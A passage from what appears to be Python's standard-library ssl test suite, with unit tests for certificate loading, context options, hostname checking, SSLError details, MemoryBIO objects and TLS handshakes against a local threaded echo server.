self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
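# load_dh_params() accepts str paths (and bytes paths outside Windows); missing
# files raise FileNotFoundError, non-DH PEM data raises SSLError.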
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
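# A fresh context reports all-zero session statistics for every protocol.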
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
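# Only certificates added via load_verify_locations() show up in
# cert_store_stats(); CA certs are counted separately from end-entity certs.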
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
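# load_default_certs() accepts no argument or a Purpose value, but rejects
# None and plain strings.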
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
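# eof only becomes true after write_eof() has been called and all buffered
# data has been read.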
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
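# pending reports the number of unread bytes currently buffered in the BIO.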
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
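# Perform the handshake manually on a non-blocking socket, retrying with
# select() on SSLWantReadError/SSLWantWriteError.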
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop. Call func(*args); depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
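# Drive a full handshake through MemoryBIO objects via wrap_bio(); the cipher,
# peer certificate and channel binding only become available afterwards.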
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
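# Echo a small payload through an SSLObject backed by MemoryBIOs, then shut
# the connection down with unwrap().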
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
